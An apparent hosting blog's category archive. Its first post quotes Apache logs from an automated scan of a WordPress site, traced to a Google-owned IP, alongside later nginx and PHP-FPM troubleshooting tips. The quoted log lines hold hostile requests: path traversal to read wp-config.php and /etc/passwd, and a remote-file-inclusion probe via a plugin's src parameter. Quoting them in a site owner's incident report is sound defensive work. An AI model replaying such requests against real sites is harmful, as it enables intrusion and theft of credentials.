Category Archives: Hosting

WTF?! Is Google trying to hack WordPress sites??

Looking through the Apache access logs of one of my WordPress installations the other day, I notices these entries:

35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /robots.txt HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:07 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 410 318 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "POST /wp-content/plugins/wp-symposium/server/php/index.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "GET /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"

First of all: all these logged requests are coming from IP address 35.198.55.156 which is reported by Whois ARIN as belonging to Google Inc, Mountain View, USA.

Now, notice the first log entry accessing the /robots.txt which seems perfectly fine. Specially since is’s Google, right? But then again, the User-Agent is marked as “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32” which is not any of the usual Google crawler User-Agents. Besides, it says “Windows NT 10.0” and “OPR/36.0.2130.32” (Opera 36 browser as reported by whatismybrowser.com) in there.

Triggered by the weird attempts that follow immediately in the few seconds after that first entry, trying access files and locations that do not exist, like /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js, /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php (what? trying to access a very hacky file on on another site through mine?), /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php or even /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd (seriously? trying to download the server passwd file?!)… this is very disturbing.

Is Google scanning for vulnerabilities which it would then kindly announce to me when any would be found? I’ve never heard that before… Is this coming from one of their employees who came in with his/her own Window$ (obviously) laptop, unaware of the fact it has a bot running in the background? Seems unlikely to be using that specific Opera user agent… Or are they actually trying to hack my application?

I reported the incident to Google and hope — but don’t expect — to hear more from them soon!

Anybody knows what could be going on here?

Nginx 1.8.0 “/usr/sbin/service: line 123: exec: reload: not found”

Recently, on one of our older servers, a Debian 6 installation, Nginx was upgraded to 1.8.0 from the dotdeb repos. The update went without any apparent errors, except one — easy to miss — message at the end:

/usr/sbin/service: line 123: exec: reload: not found

In fact, I had missed that and assumed all was fine but after a while the server went down and Nginx would not start again. At least, not after the usual nginx -t && service nginx reload

To my surprise, all other web services like php5-fpm, mysql etc. reloaded just fine with  service ... reload

A reboot did not start nginx either and service nginx start got a similar response:

/usr/sbin/service: line 123: exec: start: not found

Luckily, upon /etc/init.d/nginx start Nginx started correctly so I had my server running again. But I was not closer to finding the cause nor a solution.

Searching the web specifically for nginx 1.8 and debian 6 related issues did not reveal anything of interest. Only one question mentioning the issue in the comments on https://www.dotdeb.org/2015/05/07/nginx-1-8-0/ but it got no response.

I did find a bug report related to an entirely different service which mentioned the same error. And the solution there was to remove that service’s .conf file from /etc/init … so I looked in /etc/init and yes: there was an nginx.conf file there. And yes again: simply deleting it solved the problem!

502 Bad Gateway after upgrade to PHP 5.5.5 on Nginx server

Quick tip: If you’re getting 502 Bad Gateway errors after upgrading your Debian Wheezy Nginx server to PHP5-FPM 5.5.5 then check out your www.conf file. Look for these lines:

;listen.owner = www-data
;listen.group = www-data

Uncomment them by removing the ‘;’ in front of all these lines so it looks like:

listen.owner = www-data
listen.group = www-data

Then load the new settings into PHP, which on my Nginx servers usually is done with:

service php5-fpm reload

WordPress 3.7 “Basie”

The Status 301 Network has just been upgraded successfully to the latest stable WordPress release: 3.7.1 “Basie”. Moreover, the admin theme MP6 has been added in preparation of the expected 3.8 release in December, providing a cleaner admin interface.

mp6 dashboard

Read more about new features in WordPress 3.7 “Basie” on the WordPress News blog.